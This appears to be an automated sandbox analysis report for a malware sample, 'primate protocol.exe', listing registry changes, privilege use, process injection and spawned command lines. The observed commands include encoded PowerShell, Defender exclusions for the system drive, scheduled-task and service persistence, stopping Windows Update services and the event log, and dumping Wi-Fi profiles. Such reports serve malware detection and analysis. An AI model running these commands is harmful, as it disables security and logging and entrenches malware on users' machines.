Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\systemprocess.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\Windows\host.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\systemprocess.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\systemprocess.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\CompPkg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\host.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\systemprocess.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1484 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 5768 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 1484 wrote to memory of 5768 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\systemprocess.exe
PID 1484 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 1484 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\host.exe
PID 1484 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 1484 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\primate protocol.exe C:\Windows\CompPkg.exe
PID 5768 wrote to memory of 3340 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5768 wrote to memory of 3340 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3076 wrote to memory of 4768 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 3076 wrote to memory of 4768 N/A C:\Windows\CompPkg.exe C:\Windows\System32\schtasks.exe
PID 5156 wrote to memory of 5776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 5156 wrote to memory of 5776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\CompPkg.exe
PID 5768 wrote to memory of 3128 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 5768 wrote to memory of 3128 N/A C:\Windows\systemprocess.exe C:\Windows\SYSTEM32\netsh.exe
PID 5768 wrote to memory of 5664 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5768 wrote to memory of 5664 N/A C:\Windows\systemprocess.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 3016 wrote to memory of 848 N/A C:\Windows\host.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5008 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 5268 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 1480 wrote to memory of 2336 N/A C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe C:\Windows\system32\dialer.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 5316 wrote to memory of 4636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 4396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\primate protocol.exe

"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="

C:\Windows\systemprocess.exe

"C:\Windows\systemprocess.exe"

C:\Windows\host.exe

"C:\Windows\host.exe"

C:\Windows\CompPkg.exe

"C:\Windows\CompPkg.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\netsh.exe

"netsh" wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "PROCESS HOST"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "PROCESS HOST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

